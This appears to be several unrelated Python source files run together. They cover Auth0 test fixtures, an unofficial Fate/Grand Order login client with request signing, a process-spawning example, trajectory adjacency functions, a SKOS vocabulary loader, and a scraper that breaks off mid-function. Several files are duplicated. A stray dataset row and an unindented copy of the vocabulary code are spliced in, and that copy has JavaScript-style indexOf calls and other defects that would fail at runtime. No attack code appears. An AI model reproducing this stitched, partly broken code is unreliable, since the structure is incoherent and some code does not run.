import logging

import pytest

from test_app.models import Auth0User
from tests.utils.auth0 import (
    create_auth0_users_and_confirm,
    delete_all_auth0_users as delete_all_auth0_users_via_api,
    delete_all_auth0_users_with_confirmation,
    pause_and_confirm_total_auth0_users,
)

logger = logging.getLogger(__name__)

# Seconds to wait for Auth0's eventually-consistent user list to settle.
DELAY = 15

# TODO: Refactor/Remove these fixtures as I'm not testing things the same way anymore.


@pytest.fixture(scope="class")
def one_auth0_user(request):
    """
    Pytest fixture providing one Auth0 user for testing.

    Create a new user in Auth0 and add it to the class of our requesting test
    case class at runtime.  This is a little different than most pytest
    fixtures because we are working around the fact that we are using
    SeleniumTestCase for some tests, which as a subclass of TestCase cannot
    use normal pytest fixture based parametrization.

    :param request: the pytest fixture request object
    """
    users = create_auth0_users_and_confirm(1)
    request.cls.user = users[0]


@pytest.fixture(scope='function')
def delete_all_auth0_users():
    """Delete every Auth0 user before and after the test."""
    logger.info('Deleting all auth0 users.')
    delete_all_auth0_users_via_api()
    yield
    logger.info('Deleting all auth0 users.')
    delete_all_auth0_users_via_api()


@pytest.fixture(scope='function')
def delete_all_django_users():
    """Delete every Django Auth0User object before and after the test."""
    logger.info('Deleting Django User objects.')
    Auth0User.objects.all().delete()
    yield
    logger.info('Deleting Django User objects.')
    Auth0User.objects.all().delete()


@pytest.fixture(scope='function')
def cleanup_django_and_auth0():
    """Delete all Auth0 users and Django user objects before and after the test."""
    logger.info('Deleting all auth0 users.')
    delete_all_auth0_users_via_api()
    logger.info('Deleting Django User objects.')
    Auth0User.objects.all().delete()
    yield
    logger.info('Deleting Django User objects.')
    Auth0User.objects.all().delete()
    logger.info('Deleting all auth0 users.')
    delete_all_auth0_users_via_api()


def _provision_auth0_users(number_of_users, fixture_name):
    """
    Shared implementation for the N-user fixtures below.

    Wipes Auth0 and Django users, creates `number_of_users` confirmed Auth0
    users, yields to the test, then wipes everything again.
    """
    logger.info('Start of %s() fixture.', fixture_name)
    logger.info('Deleting all auth0 users.')
    delete_all_auth0_users_with_confirmation()
    logger.info('Deleting Django User objects.')
    Auth0User.objects.all().delete()
    create_auth0_users_and_confirm(number_of_users)
    pause_and_confirm_total_auth0_users(DELAY, number_of_users)
    yield
    logger.info('Deleting Django User objects.')
    Auth0User.objects.all().delete()
    logger.info('Deleting all auth0 users.')
    delete_all_auth0_users_with_confirmation()
    logger.info('End of %s() fixture.', fixture_name)


@pytest.fixture(scope='function')
def one_user():
    """Provide exactly 1 confirmed Auth0 user (clean state before and after)."""
    yield from _provision_auth0_users(1, 'one_user')


@pytest.fixture(scope='function')
def five_users():
    """Provide exactly 5 confirmed Auth0 users (clean state before and after)."""
    yield from _provision_auth0_users(5, 'five_users')


@pytest.fixture(scope='function')
def ten_users():
    """Provide exactly 10 confirmed Auth0 users (clean state before and after)."""
    yield from _provision_auth0_users(10, 'ten_users')


@pytest.fixture(scope='function')
def with_33_auth0_users():
    """Provide exactly 33 confirmed Auth0 users (clean state before and after)."""
    # bug fix: previously logged 'ten_users' as the fixture name
    yield from _provision_auth0_users(33, 'with_33_auth0_users')


@pytest.fixture(scope='function')
def with_100_auth0_users():
    """Provide exactly 100 confirmed Auth0 users (clean state before and after)."""
    # bug fix: previously logged 'ten_users' as the fixture name
    yield from _provision_auth0_users(100, 'with_100_auth0_users')
import base64
import hashlib
import uuid
from urllib.parse import quote_plus

import fgourl
import mytime

# NOTE(review): indentation reconstructed from a whitespace-stripped source.


class ParameterBuilder:
    """Builds the signed, url-encoded request body for FGO API calls."""

    def __init__(self, uid: str, auth_key: str, secret_key: str):
        self.uid_ = uid
        self.auth_key_ = auth_key
        self.secret_key_ = secret_key
        self.content_ = ''
        self.parameter_list_ = self._default_parameters()

    def _default_parameters(self):
        """Return the baseline parameters every request carries (fresh each call)."""
        return [
            ('appVer', fgourl.app_ver_),
            ('authKey', self.auth_key_),
            ('dataVer', str(fgourl.data_ver_)),
            ('dateVer', str(fgourl.date_ver_)),
            ('idempotencyKey', str(uuid.uuid4())),
            ('lastAccessTime', str(mytime.GetTimeStamp())),
            ('userId', self.uid_),
            ('verCode', fgourl.ver_code_),
        ]

    def AddParameter(self, key: str, value: str):
        """Append one extra (key, value) parameter for the next Build()."""
        self.parameter_list_.append((key, value))

    def Build(self) -> str:
        """
        Return the url-encoded body with an appended authCode signature.

        The signature is SHA-1 over the *unescaped* 'k=v&...' string plus
        ':' and the secret key, then base64-encoded and url-escaped.
        """
        self.parameter_list_.sort(key=lambda tup: tup[0])
        temp = ''
        for first, second in self.parameter_list_:
            if temp:
                temp += '&'
                self.content_ += '&'
            escaped_key = quote_plus(first)
            if not second:
                temp += first + '='
                self.content_ += escaped_key + '='
            else:
                escaped_value = quote_plus(second)
                temp += first + '=' + second
                self.content_ += escaped_key + '=' + escaped_value
        temp += ':' + self.secret_key_
        self.content_ += '&authCode=' + quote_plus(base64.b64encode(hashlib.sha1(temp.encode('utf-8')).digest()))
        return self.content_

    def Clean(self):
        """Reset the builder for the next request."""
        self.content_ = ''
        self.parameter_list_ = self._default_parameters()


class user:
    """A logged-in FGO account bound to one HTTP session."""

    def __init__(self, user_id: str, auth_key: str, secret_key: str):
        self.name_ = ''
        self.user_id_ = int(user_id)  # bug-prone C-style cast replaced with a plain call
        self.s_ = fgourl.NewSession()
        self.builder_ = ParameterBuilder(user_id, auth_key, secret_key)

    def Post(self, url):
        """POST the currently built parameters to url and reset the builder."""
        res = fgourl.PostReq(self.s_, url, self.builder_.Build())
        self.builder_.Clean()
        return res

    def topLogin(self):
        """
        Perform the daily /login/top call and return a markdown-style summary
        string (level, stones, tickets, AP, friend points, login bonuses).
        """
        # parameter_list_[5] is ('lastAccessTime', ...) in the default layout
        # -- fragile positional access; kept for behavioral compatibility.
        lastAccessTime = self.builder_.parameter_list_[5][1]
        userState = (-int(lastAccessTime) >> 2) ^ self.user_id_ & fgourl.data_server_folder_crc_
        self.builder_.AddParameter('assetbundleFolder', fgourl.asset_bundle_folder_)
        self.builder_.AddParameter('isTerminalLogin', '1')
        self.builder_.AddParameter('userState', str(userState))
        data = self.Post(f'{fgourl.server_addr_}/login/top?_userId={self.user_id_}')
        self.name_ = hashlib.md5(data['cache']['replaced']['userGame'][0]['name'].encode('utf-8')).hexdigest()
        stone = data['cache']['replaced']['userGame'][0]['stone']
        lv = data['cache']['replaced']['userGame'][0]['lv']
        ticket = 0
        # Summoning tickets (item id 4001).
        for item in data['cache']['replaced']['userItem']:
            if item['itemId'] == 4001:
                ticket = item['num']
                break
        # Login-day counters.
        login_days = data['cache']['updated']['userLogin'][0]['seqLoginCount']
        total_days = data['cache']['updated']['userLogin'][0]['totalLoginCount']
        res = f'*{self.name_}*\n`登陆天数: {login_days}天 / {total_days}天\n'
        # Account info.
        res += f'等级: {lv}\n石头: {stone}\n呼符: {ticket}\n'
        # Current AP (recovers 1 point per 300 seconds).
        act_max = data['cache']['replaced']['userGame'][0]['actMax']
        act_recover_at = data['cache']['replaced']['userGame'][0]['actRecoverAt']
        now_act = (act_max - (act_recover_at - mytime.GetTimeStamp()) / 300)
        res += f'体力: {now_act} / {act_max}\n'
        # Friend points.
        add_fp = data['response'][0]['success']['addFriendPoint']
        total_fp = data['cache']['replaced']['tblUserGame'][0]['friendPoint']
        res += f'友情点: {add_fp} / {total_fp}`\n'
        # Sequential login bonus, when present.
        if 'seqLoginBonus' in data['response'][0]['success']:
            bonus_message = data['response'][0]['success']['seqLoginBonus'][0]['message']
            res += f'*{bonus_message}*\n`'
            for i in data['response'][0]['success']['seqLoginBonus'][0]['items']:
                res += f'{i["name"]} X {i["num"]}\n'
        # Campaign bonus, when present.
        if 'campaignbonus' in data['response'][0]['success']:
            bonus_name = data['response'][0]['success']['campaignbonus'][0]['name']
            bonus_detail = data['response'][0]['success']['campaignbonus'][0]['detail']
            res += f'`*{bonus_name}*\n*{bonus_detail}*\n`'
            for i in data['response'][0]['success']['campaignbonus'][0]['items']:
                res += f'{i["name"]} X {i["num"]}\n'
            res += '`'
        server_now_time = mytime.TimeStampToString(data['cache']['serverTime'])
        res += f'_{server_now_time}_\n--------\n'
        print(res)
        return res

    def topHome(self):
        """Perform the /home/top call (moves the session to the home screen)."""
        self.Post(f'{fgourl.server_addr_}/home/top?_userId={self.user_id_}')
import base64
import hashlib
import uuid
from urllib.parse import quote_plus

import fgourl
import mytime

# NOTE(review): indentation reconstructed from a whitespace-stripped source.


class ParameterBuilder:
    """Builds the signed, url-encoded request body for FGO API calls."""

    def __init__(self, uid: str, auth_key: str, secret_key: str):
        self.uid_ = uid
        self.auth_key_ = auth_key
        self.secret_key_ = secret_key
        self.content_ = ''
        self.parameter_list_ = self._default_parameters()

    def _default_parameters(self):
        """Return the baseline parameters every request carries (fresh each call)."""
        return [
            ('appVer', fgourl.app_ver_),
            ('authKey', self.auth_key_),
            ('dataVer', str(fgourl.data_ver_)),
            ('dateVer', str(fgourl.date_ver_)),
            ('idempotencyKey', str(uuid.uuid4())),
            ('lastAccessTime', str(mytime.GetTimeStamp())),
            ('userId', self.uid_),
            ('verCode', fgourl.ver_code_),
        ]

    def AddParameter(self, key: str, value: str):
        """Append one extra (key, value) parameter for the next Build()."""
        self.parameter_list_.append((key, value))

    def Build(self) -> str:
        """
        Return the url-encoded body with an appended authCode signature.

        The signature is SHA-1 over the *unescaped* 'k=v&...' string plus
        ':' and the secret key, then base64-encoded and url-escaped.
        """
        self.parameter_list_.sort(key=lambda tup: tup[0])
        temp = ''
        for first, second in self.parameter_list_:
            if temp:
                temp += '&'
                self.content_ += '&'
            escaped_key = quote_plus(first)
            if not second:
                temp += first + '='
                self.content_ += escaped_key + '='
            else:
                escaped_value = quote_plus(second)
                temp += first + '=' + second
                self.content_ += escaped_key + '=' + escaped_value
        temp += ':' + self.secret_key_
        self.content_ += '&authCode=' + quote_plus(base64.b64encode(hashlib.sha1(temp.encode('utf-8')).digest()))
        return self.content_

    def Clean(self):
        """Reset the builder for the next request."""
        self.content_ = ''
        self.parameter_list_ = self._default_parameters()


class user:
    """A logged-in FGO account bound to one HTTP session."""

    def __init__(self, user_id: str, auth_key: str, secret_key: str):
        self.name_ = ''
        self.user_id_ = int(user_id)  # bug-prone C-style cast replaced with a plain call
        self.s_ = fgourl.NewSession()
        self.builder_ = ParameterBuilder(user_id, auth_key, secret_key)

    def Post(self, url):
        """POST the currently built parameters to url and reset the builder."""
        res = fgourl.PostReq(self.s_, url, self.builder_.Build())
        self.builder_.Clean()
        return res

    def topLogin(self):
        """
        Perform the daily /login/top call and return a markdown-style summary
        string (level, stones, tickets, AP, friend points, login bonuses).
        """
        # parameter_list_[5] is ('lastAccessTime', ...) in the default layout
        # -- fragile positional access; kept for behavioral compatibility.
        lastAccessTime = self.builder_.parameter_list_[5][1]
        userState = (-int(lastAccessTime) >> 2) ^ self.user_id_ & fgourl.data_server_folder_crc_
        self.builder_.AddParameter('assetbundleFolder', fgourl.asset_bundle_folder_)
        self.builder_.AddParameter('isTerminalLogin', '1')
        self.builder_.AddParameter('userState', str(userState))
        data = self.Post(f'{fgourl.server_addr_}/login/top?_userId={self.user_id_}')
        self.name_ = hashlib.md5(data['cache']['replaced']['userGame'][0]['name'].encode('utf-8')).hexdigest()
        stone = data['cache']['replaced']['userGame'][0]['stone']
        lv = data['cache']['replaced']['userGame'][0]['lv']
        ticket = 0
        # Summoning tickets (item id 4001).
        for item in data['cache']['replaced']['userItem']:
            if item['itemId'] == 4001:
                ticket = item['num']
                break
        # Login-day counters.
        login_days = data['cache']['updated']['userLogin'][0]['seqLoginCount']
        total_days = data['cache']['updated']['userLogin'][0]['totalLoginCount']
        res = f'*{self.name_}*\n`登陆天数: {login_days}天 / {total_days}天\n'
        # Account info.
        res += f'等级: {lv}\n石头: {stone}\n呼符: {ticket}\n'
        # Current AP (recovers 1 point per 300 seconds).
        act_max = data['cache']['replaced']['userGame'][0]['actMax']
        act_recover_at = data['cache']['replaced']['userGame'][0]['actRecoverAt']
        now_act = (act_max - (act_recover_at - mytime.GetTimeStamp()) / 300)
        res += f'体力: {now_act} / {act_max}\n'
        # Friend points.
        add_fp = data['response'][0]['success']['addFriendPoint']
        total_fp = data['cache']['replaced']['tblUserGame'][0]['friendPoint']
        res += f'友情点: {add_fp} / {total_fp}`\n'
        # Sequential login bonus, when present.
        if 'seqLoginBonus' in data['response'][0]['success']:
            bonus_message = data['response'][0]['success']['seqLoginBonus'][0]['message']
            res += f'*{bonus_message}*\n`'
            for i in data['response'][0]['success']['seqLoginBonus'][0]['items']:
                res += f'{i["name"]} X {i["num"]}\n'
        # Campaign bonus, when present.
        if 'campaignbonus' in data['response'][0]['success']:
            bonus_name = data['response'][0]['success']['campaignbonus'][0]['name']
            bonus_detail = data['response'][0]['success']['campaignbonus'][0]['detail']
            res += f'`*{bonus_name}*\n*{bonus_detail}*\n`'
            for i in data['response'][0]['success']['campaignbonus'][0]['items']:
                res += f'{i["name"]} X {i["num"]}\n'
            res += '`'
        server_now_time = mytime.TimeStampToString(data['cache']['serverTime'])
        res += f'_{server_now_time}_\n--------\n'
        print(res)
        return res

    def topHome(self):
        """Perform the /home/top call (moves the session to the home screen)."""
        self.Post(f'{fgourl.server_addr_}/home/top?_userId={self.user_id_}')
import os, sys

# Spawn ten copies of child.py: os.spawnv on Windows (no fork there),
# fork + exec on Unix.
for i in range(10):
    if sys.platform[:3] == 'win':
        pypath = sys.executable
        os.spawnv(os.P_NOWAIT, pypath, ('python', 'child.py', str(i)))
    else:
        pid = os.fork()
        if pid != 0:
            # Parent: report the child's pid and keep looping.
            print('Process %d spawned' % pid)
        else:
            # Child: replace this process image with child.py.
            os.execlp('python', 'python', 'child.py', str(i))
print('Main process exiting.')

"""
In this script, we call os.spawnv with a process mode flag, the full
directory path to the Python interpreter, and a tuple of strings representing the shell
command line with which to start a new program.
The path to the Python interpreter executable program running a script is available as
sys.executable. In general, the process mode flag is taken from these predefined values:
os.P_NOWAIT and os.P_NOWAITO
The spawn functions will return as soon as the new process has been created, with
the process ID as the return value. Available on Unix and Windows.
os.P_WAIT
The spawn functions will not return until the new process has run to completion
and will return the exit code of the process if the run is successful or "-signal" if a
signal kills the process. Available on Unix and Windows.
os.P_DETACH and os.P_OVERLAY
P_DETACH is similar to P_NOWAIT, but the new process is detached from the console
of the calling process. If P_OVERLAY is used, the current program will be replaced
(much like os.exec). Available on Windows.
In fact, there are eight different calls in the spawn family, which all start a program but
vary slightly in their call signatures. In their names, an "l" means you list arguments
individually, "p" means the executable file is looked up on the system path, and "e"
means a dictionary is passed in to provide the shelled environment of the spawned
program: the os.spawnve call, for example, works the same way as os.spawnv but accepts
an extra fourth dictionary argument to specify a different shell environment for the
spawned program.
All the process mode flags are supported on Windows, but detach and
overlay modes are not available on Unix. Because this sort of detail may be prone to
change, to verify which are present, be sure to see the library manual or run a dir builtin
function call on the os module after an import.
"""
import os, sys

# Spawn ten copies of child.py: os.spawnv on Windows (no fork there),
# fork + exec on Unix.
for i in range(10):
    if sys.platform[:3] == 'win':
        pypath = sys.executable
        os.spawnv(os.P_NOWAIT, pypath, ('python', 'child.py', str(i)))
    else:
        pid = os.fork()
        if pid != 0:
            # Parent: report the child's pid and keep looping.
            print('Process %d spawned' % pid)
        else:
            # Child: replace this process image with child.py.
            os.execlp('python', 'python', 'child.py', str(i))
print('Main process exiting.')

"""
In this script, we call os.spawnv with a process mode flag, the full
directory path to the Python interpreter, and a tuple of strings representing the shell
command line with which to start a new program.
The path to the Python interpreter executable program running a script is available as
sys.executable. In general, the process mode flag is taken from these predefined values:
os.P_NOWAIT and os.P_NOWAITO
The spawn functions will return as soon as the new process has been created, with
the process ID as the return value. Available on Unix and Windows.
os.P_WAIT
The spawn functions will not return until the new process has run to completion
and will return the exit code of the process if the run is successful or "-signal" if a
signal kills the process. Available on Unix and Windows.
os.P_DETACH and os.P_OVERLAY
P_DETACH is similar to P_NOWAIT, but the new process is detached from the console
of the calling process. If P_OVERLAY is used, the current program will be replaced
(much like os.exec). Available on Windows.
In fact, there are eight different calls in the spawn family, which all start a program but
vary slightly in their call signatures. In their names, an "l" means you list arguments
individually, "p" means the executable file is looked up on the system path, and "e"
means a dictionary is passed in to provide the shelled environment of the spawned
program: the os.spawnve call, for example, works the same way as os.spawnv but accepts
an extra fourth dictionary argument to specify a different shell environment for the
spawned program.
All the process mode flags are supported on Windows, but detach and
overlay modes are not available on Unix. Because this sort of detail may be prone to
change, to verify which are present, be sure to see the library manual or run a dir builtin
function call on the os module after an import.
"""
import numpy as np
import torch
from scipy.spatial import distance_matrix

from utils.block_diag_matrix import block_diag_irregular

# NOTE(review): indentation reconstructed from a whitespace-stripped source.


def _knn_binary_matrix(dists, top_k_neigh):
    """Return a 0/1 matrix marking each row's top-k nearest columns of `dists`."""
    knn = np.argsort(dists, axis=1)[:, 0: min(top_k_neigh, dists.shape[0])]
    rows = []
    for i in range(dists.shape[0]):
        knni = np.zeros((dists.shape[1],))
        knni[knn[i]] = 1
        rows.append(knni)
    return np.stack(rows)


def compute_adjs(args, seq_start_end):
    """Fully connected (all-ones) adjacency per sequence group and time step."""
    adj_out = []
    for _, (start, end) in enumerate(seq_start_end):
        mat = []
        for t in range(0, args.obs_len + args.pred_len):
            interval = end - start
            mat.append(torch.from_numpy(np.ones((interval, interval))))
        adj_out.append(torch.stack(mat, 0))
    return block_diag_irregular(adj_out)


def compute_adjs_knnsim(args, seq_start_end, obs_traj, pred_traj_gt):
    """Binary k-NN adjacency per group/time step based on pairwise distances."""
    # Hoisted out of the loop: the concatenation is invariant w.r.t. (start, end).
    obs_and_pred_traj = torch.cat((obs_traj, pred_traj_gt))
    adj_out = []
    for _, (start, end) in enumerate(seq_start_end):
        knn_t = []
        for t in range(0, args.obs_len + args.pred_len):
            dists = distance_matrix(np.asarray(obs_and_pred_traj[t, start:end, :]),
                                    np.asarray(obs_and_pred_traj[t, start:end, :]))
            knn_t.append(torch.from_numpy(_knn_binary_matrix(dists, args.top_k_neigh)))
        adj_out.append(torch.stack(knn_t, 0))
    return block_diag_irregular(adj_out)


def compute_adjs_distsim(args, seq_start_end, obs_traj, pred_traj_gt):
    """Gaussian-kernel similarity adjacency per group/time step."""
    # Hoisted out of the loop: the concatenation is invariant w.r.t. (start, end).
    obs_and_pred_traj = torch.cat((obs_traj, pred_traj_gt))
    adj_out = []
    for _, (start, end) in enumerate(seq_start_end):
        sim_t = []
        for t in range(0, args.obs_len + args.pred_len):
            dists = distance_matrix(np.asarray(obs_and_pred_traj[t, start:end, :]),
                                    np.asarray(obs_and_pred_traj[t, start:end, :]))
            sim = np.exp(-dists / args.sigma)
            sim_t.append(torch.from_numpy(sim))
        adj_out.append(torch.stack(sim_t, 0))
    return block_diag_irregular(adj_out)


def compute_adjs_knnsim_pred(top_k_neigh, seq_start_end, pred_traj):
    """Binary k-NN adjacency for a single predicted frame."""
    adj_out = []
    for _, (start, end) in enumerate(seq_start_end):
        dists = distance_matrix(np.asarray(pred_traj[start:end, :]),
                                np.asarray(pred_traj[start:end, :]))
        adj_out.append(torch.from_numpy(_knn_binary_matrix(dists, top_k_neigh)))
    return block_diag_irregular(adj_out)


def compute_adjs_distsim_pred(sigma, seq_start_end, pred_traj):
    """Gaussian-kernel similarity adjacency for a single predicted frame."""
    adj_out = []
    for _, (start, end) in enumerate(seq_start_end):
        dists = distance_matrix(np.asarray(pred_traj[start:end, :]),
                                np.asarray(pred_traj[start:end, :]))
        adj_out.append(torch.from_numpy(np.exp(-dists / sigma)))
    return block_diag_irregular(adj_out)
import numpy as np
import torch
from scipy.spatial import distance_matrix

from utils.block_diag_matrix import block_diag_irregular

# NOTE(review): indentation reconstructed from a whitespace-stripped source.


def _knn_binary_matrix(dists, top_k_neigh):
    """Return a 0/1 matrix marking each row's top-k nearest columns of `dists`."""
    knn = np.argsort(dists, axis=1)[:, 0: min(top_k_neigh, dists.shape[0])]
    rows = []
    for i in range(dists.shape[0]):
        knni = np.zeros((dists.shape[1],))
        knni[knn[i]] = 1
        rows.append(knni)
    return np.stack(rows)


def compute_adjs(args, seq_start_end):
    """Fully connected (all-ones) adjacency per sequence group and time step."""
    adj_out = []
    for _, (start, end) in enumerate(seq_start_end):
        mat = []
        for t in range(0, args.obs_len + args.pred_len):
            interval = end - start
            mat.append(torch.from_numpy(np.ones((interval, interval))))
        adj_out.append(torch.stack(mat, 0))
    return block_diag_irregular(adj_out)


def compute_adjs_knnsim(args, seq_start_end, obs_traj, pred_traj_gt):
    """Binary k-NN adjacency per group/time step based on pairwise distances."""
    # Hoisted out of the loop: the concatenation is invariant w.r.t. (start, end).
    obs_and_pred_traj = torch.cat((obs_traj, pred_traj_gt))
    adj_out = []
    for _, (start, end) in enumerate(seq_start_end):
        knn_t = []
        for t in range(0, args.obs_len + args.pred_len):
            dists = distance_matrix(np.asarray(obs_and_pred_traj[t, start:end, :]),
                                    np.asarray(obs_and_pred_traj[t, start:end, :]))
            knn_t.append(torch.from_numpy(_knn_binary_matrix(dists, args.top_k_neigh)))
        adj_out.append(torch.stack(knn_t, 0))
    return block_diag_irregular(adj_out)


def compute_adjs_distsim(args, seq_start_end, obs_traj, pred_traj_gt):
    """Gaussian-kernel similarity adjacency per group/time step."""
    # Hoisted out of the loop: the concatenation is invariant w.r.t. (start, end).
    obs_and_pred_traj = torch.cat((obs_traj, pred_traj_gt))
    adj_out = []
    for _, (start, end) in enumerate(seq_start_end):
        sim_t = []
        for t in range(0, args.obs_len + args.pred_len):
            dists = distance_matrix(np.asarray(obs_and_pred_traj[t, start:end, :]),
                                    np.asarray(obs_and_pred_traj[t, start:end, :]))
            sim = np.exp(-dists / args.sigma)
            sim_t.append(torch.from_numpy(sim))
        adj_out.append(torch.stack(sim_t, 0))
    return block_diag_irregular(adj_out)


def compute_adjs_knnsim_pred(top_k_neigh, seq_start_end, pred_traj):
    """Binary k-NN adjacency for a single predicted frame."""
    adj_out = []
    for _, (start, end) in enumerate(seq_start_end):
        dists = distance_matrix(np.asarray(pred_traj[start:end, :]),
                                np.asarray(pred_traj[start:end, :]))
        adj_out.append(torch.from_numpy(_knn_binary_matrix(dists, top_k_neigh)))
    return block_diag_irregular(adj_out)


def compute_adjs_distsim_pred(sigma, seq_start_end, pred_traj):
    """Gaussian-kernel similarity adjacency for a single predicted frame."""
    adj_out = []
    for _, (start, end) in enumerate(seq_start_end):
        dists = distance_matrix(np.asarray(pred_traj[start:end, :]),
                                np.asarray(pred_traj[start:end, :]))
        adj_out.append(torch.from_numpy(np.exp(-dists / sigma)))
    return block_diag_irregular(adj_out)
from SPARQLTransformer import sparqlTransformer

from .lemma import Lemma

SKOS = 'http://www.w3.org/2004/02/skos/core#'

# NOTE(review): indentation reconstructed from a whitespace-stripped source.


class Vocabulary:
    # Registry of loaded vocabularies by name.
    # NOTE(review): the attribute shadows the builtin name 'list'; kept
    # unchanged because external callers may reference Vocabulary.list.
    list = {}

    @classmethod
    def createVocabulary(cls, name, trunkNamespace, namespaces, prop, lang):
        # NOTE(review): Vocabulary.__init__ accepts (data, family); this call
        # passes five arguments and would raise TypeError at runtime --
        # pre-existing defect, confirm the intended constructor signature.
        Vocabulary.add(name, Vocabulary(name, trunkNamespace, namespaces, prop, lang))

    @classmethod
    def add(cls, name, vocabulary):
        """Register a vocabulary instance under `name`."""
        Vocabulary.list[name] = vocabulary

    @classmethod
    def load(cls, name, schema, endpoint):
        """
        Query `endpoint` for every SKOS concept in scheme(s) `schema`,
        register the resulting Vocabulary under `name`, and return it.
        """
        query = {
            '@context': SKOS,
            '@graph': [{
                '@type': 'Concept',
                '@id': '?id',
                'prefLabel': '$skos:prefLabel$required',
                'altLabel': '$skos:altLabel|skos:hiddenLabel',
                'exactMatch': '$skos:exactMatch',
                'inScheme': '?namespace',
            }],
            '$where': '{ ?id skos:inScheme|skos:topConceptOf ?namespace } UNION { ?namespace skos:member ?id}',
            '$values': {
                'namespace': schema,
            },
            '$prefixes': {
                'skos': 'http://www.w3.org/2004/02/skos/core#'
            }
        }
        options = {
            'endpoint': endpoint,
            'debug': False}
        result = sparqlTransformer(query, options)
        if isinstance(schema, list):
            # bug fix: 'indexOf' is JavaScript; Python lists use index().
            # NOTE(review): the original keyed on the whole lemma dict, which
            # can never appear in `schema` (a list of scheme URIs); keying on
            # 'inScheme' looks like the intent -- confirm against callers.
            result['@graph'].sort(key=lambda _x: schema.index(_x.get('inScheme')))

        def search_id(ex):
            # Inline the lemma whose @id equals `ex`, removing it from the graph.
            lemma = next((l for l in result['@graph'] if l['@id'] == ex), None)
            if lemma:
                # bug fix: list.index(), not the JavaScript indexOf().
                result['@graph'].pop(result['@graph'].index(lemma))
                return lemma
            return ex

        # search_id() mutates result['@graph'], so iterate over a snapshot and
        # skip entries that were already inlined into another lemma.
        for x in [l for l in result['@graph']]:
            if 'exactMatch' in x:
                if x not in result['@graph']:
                    continue
                exm = x['exactMatch']
                if not isinstance(exm, list):
                    exm = [exm]
                # bug fix: x is a dict from the JSON graph, so assign the key;
                # the original attribute assignment would raise AttributeError.
                x['exactMatch'] = [search_id(ex) for ex in exm]
        voc = Vocabulary(result, schema)
        Vocabulary.add(name, voc)
        return voc

    @classmethod
    def get_all(cls, name, scheme, endpoint):
        """Return vocabulary `name`, loading it from `endpoint` on first use."""
        if name not in Vocabulary.list:
            Vocabulary.load(name, scheme, endpoint)
        return Vocabulary.list[name]

    def __init__(self, data, family=None):
        self.family = family
        if isinstance(data, list):
            # Already a list of Lemma objects (internal use, e.g. get()).
            self.lemmata = data
            return
        self.lemmata = [Lemma(l) for l in data['@graph']]

    def flatten(self, lang='en'):
        """Return the lemmata flattened to the given language."""
        return [l.flatten(lang) for l in self.lemmata]

    def get_data(self):
        """Return the vocabulary as a JSON-LD document."""
        return {
            '@context': SKOS,
            '@graph': [l.data for l in self.lemmata]
        }

    def get(self, _id):
        """Return a new Vocabulary containing only the lemmata with id `_id`."""
        return Vocabulary([l for l in self.lemmata if l.id == _id])

    def autocomplete(self, q, lang, n=10):
        """Shorthand for search() in autocomplete mode."""
        return self.search(q, lang, n, True)
def search(self, q, lang, n=10, autocomplete=False):
matches = [Lemma(l.data, l.similar_to(q, lang, autocomplete)) for l in self.lemmata]
matches.sort(key=lambda a: -a.score)
matches = [a for a in matches if a.score][0:n]
return Vocabulary(matches) | populate/entities/vocabularies/vocabulary.py | from SPARQLTransformer import sparqlTransformer
from .lemma import Lemma
SKOS = 'http://www.w3.org/2004/02/skos/core#'
class Vocabulary:
list = {}
@classmethod
def createVocabulary(cls, name, trunkNamespace, namespaces, prop, lang):
Vocabulary.add(name, Vocabulary(name, trunkNamespace, namespaces, prop, lang))
@classmethod
def add(cls, name, vocabulary):
Vocabulary.list[name] = vocabulary
@classmethod
def load(cls, name, schema, endpoint):
query = {
'@context': SKOS,
'@graph': [{
'@type': 'Concept',
'@id': '?id',
'prefLabel': '$skos:prefLabel$required',
'altLabel': '$skos:altLabel|skos:hiddenLabel',
'exactMatch': '$skos:exactMatch',
'inScheme': '?namespace',
}],
'$where': '{ ?id skos:inScheme|skos:topConceptOf ?namespace } UNION { ?namespace skos:member ?id}',
'$values': {
'namespace': schema,
},
'$prefixes': {
'skos': 'http://www.w3.org/2004/02/skos/core#'
}
}
options = {
'endpoint': endpoint,
'debug': False}
result = sparqlTransformer(query, options)
if isinstance(schema, list):
result['@graph'].sort(key=lambda _x: schema.indexOf(_x))
def search_id(ex):
lemma = next((l for l in result['@graph'] if l['@id'] == ex), None)
if lemma:
result['@graph'].pop(result['@graph'].indexOf(lemma))
return lemma
return ex
for x in result['@graph']:
if 'exactMatch' in x:
if x not in result['@graph']:
continue
exm = x['exactMatch']
if not isinstance(exm, list):
exm = [exm]
x.exactMatch = [search_id(ex) for ex in exm]
voc = Vocabulary(result, schema)
Vocabulary.add(name, voc)
return voc
@classmethod
def get_all(cls, name, scheme, endpoint):
if name not in Vocabulary.list:
Vocabulary.load(name, scheme, endpoint)
return Vocabulary.list[name]
def __init__(self, data, family=None):
self.family = family
if isinstance(data, list):
self.lemmata = data
return
self.lemmata = [Lemma(l) for l in data['@graph']]
def flatten(self, lang='en'):
return [l.flatten(lang) for l in self.lemmata]
def get_data(self):
return {
'@context': SKOS,
'@graph': [l.data for l in self.lemmata]
}
def get(self, _id):
return Vocabulary([l for l in self.lemmata if l.id == _id])
def autocomplete(self, q, lang, n=10):
return self.search(q, lang, n, True)
def search(self, q, lang, n=10, autocomplete=False):
matches = [Lemma(l.data, l.similar_to(q, lang, autocomplete)) for l in self.lemmata]
matches.sort(key=lambda a: -a.score)
matches = [a for a in matches if a.score][0:n]
return Vocabulary(matches) | 0.702122 | 0.205117 |
import requests
from lxml import etree
import json
class Qiushi(object):
    """Scraper for qiushibaike.com: fetches 13 listing pages and stores
    per-item user info as JSON lines in qiushi.json."""

    def __init__(self):
        # Page-number template for the listing URLs.
        self.url = 'https://www.qiushibaike.com/8hr/page/{}/'
        self.url_list = None
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36'
        }
        # utf-8 explicitly: records are written with ensure_ascii=False, which
        # would crash on platforms whose default file encoding is not UTF-8.
        self.file = open('qiushi.json', 'w', encoding='utf-8')

    def generate_url_list(self):
        """Build the 13 listing-page URLs (pages 1..13)."""
        self.url_list = [self.url.format(i) for i in range(1, 14)]
        print(self.url_list)

    def get_data(self, url):
        """GET `url` and return the raw response body (bytes)."""
        response = requests.get(url, headers=self.headers)
        return response.content

    def parse_data(self, data):
        """Extract user name/link/gender/age for every item on a listing page."""
        html = etree.HTML(data)
        # Each item container carries an id of the form "qiushi_tag_<number>".
        node_list = html.xpath('//*[contains(@id, "qiushi_tag_")]')
